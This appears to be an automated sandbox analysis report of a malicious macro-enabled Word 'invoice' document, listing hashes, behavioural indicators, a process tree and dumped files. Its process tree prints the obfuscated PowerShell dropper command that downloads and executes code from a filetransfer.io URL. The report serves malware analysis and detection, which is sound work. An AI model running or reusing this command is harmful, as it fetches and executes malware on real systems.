9da040b601db75cb64fe4779cba274a42c732e34fdd3226183e30d36e8427bcc

General

Target

INVOICE PACKAGE LINK TO DOWNLOAD.docm
Size

16KB
MD5

f2d0c66b801244c059f636d08a474079
SHA1

c62129fff128817b5af62aa0051c082f9992112e
SHA256

08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873
SHA512

5283b2c228d6bdfe5d942f0a318ecd7e251e8a78d1451dc825f05e35d5e07a362e04c8777f63761b13bc672e76391cdc11be5e86ae4a260715e3e5a5cd2f305d
SSDEEP

384:/iMIoinwt9VRFPZ1AZy8WNxt/ZtNN6wyMDv6js2ZzoP6Yv:/7u651AQrxllN6wyMOAOUPPv

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://filetransfer.io/data-package/UR2whuBv/download

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	2220	2656	powershell.exe	WINWORD.EXE

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

5 2220 powershell.exe
7 2220 powershell.exe
9 2220 powershell.exe
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2656 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2220 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2220 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2656 WINWORD.EXE
2656 WINWORD.EXE

flow	pid	process
5	2220	powershell.exe
7	2220	powershell.exe
9	2220	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
2656	WINWORD.EXE

pid	process
2220	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2220	powershell.exe

pid	process
2656	WINWORD.EXE
2656	WINWORD.EXE

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

WINWORD.EXE

description	pid	process	target process
PID 2656 wrote to memory of 2220	2656	WINWORD.EXE	powershell.exe
PID 2656 wrote to memory of 2220	2656	WINWORD.EXE	powershell.exe
PID 2656 wrote to memory of 2220	2656	WINWORD.EXE	powershell.exe
PID 2656 wrote to memory of 2220	2656	WINWORD.EXE	powershell.exe
PID 2656 wrote to memory of 2916	2656	WINWORD.EXE	splwow64.exe
PID 2656 wrote to memory of 2916	2656	WINWORD.EXE	splwow64.exe
PID 2656 wrote to memory of 2916	2656	WINWORD.EXE	splwow64.exe
PID 2656 wrote to memory of 2916	2656	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INVOICE PACKAGE LINK TO DOWNLOAD.docm"
1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2916

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
2773119d5fff52b5a4e90f173b89e4e5

SHA1
8769c04067f360ae3fff05ad696473b9f8bb34e7

SHA256
df29bbff3025843c60b681bc16f12e553c3e1320e84322bee02e6f1dbfd484d6

SHA512
036a344b3a419814e41f836094d341d0040b437cfc476a506171894b2c468d6e2dd0377bea00f72fe2e7b30cb476006e9d95768941f89f0af093b16561992176

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabAAB3.tmp
Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarAB52.tmp
Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
memory/2220-66-0x000000006B210000-0x000000006B7BB000-memory.dmp

Filesize
5.7MB

Download
memory/2220-68-0x00000000027A0000-0x00000000027E0000-memory.dmp

Filesize
256KB

Download
memory/2220-67-0x000000006B210000-0x000000006B7BB000-memory.dmp

Filesize
5.7MB

Download
memory/2220-69-0x00000000027A0000-0x00000000027E0000-memory.dmp

Filesize
256KB

Download
memory/2220-70-0x00000000027A0000-0x00000000027E0000-memory.dmp

Filesize
256KB

Download
memory/2220-138-0x000000006B210000-0x000000006B7BB000-memory.dmp

Filesize
5.7MB

Download
memory/2656-54-0x000000002F1D0000-0x000000002F32D000-memory.dmp

Filesize
1.4MB

Download
memory/2656-75-0x000000002F1D0000-0x000000002F32D000-memory.dmp

Filesize
1.4MB

Download
memory/2656-61-0x0000000006090000-0x0000000006190000-memory.dmp

Filesize
1024KB

Download
memory/2656-56-0x00000000719FD000-0x0000000071A08000-memory.dmp

Filesize
44KB

Download
memory/2656-55-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2656-137-0x00000000719FD000-0x0000000071A08000-memory.dmp

Filesize
44KB

Download
memory/2656-139-0x0000000006090000-0x0000000006190000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing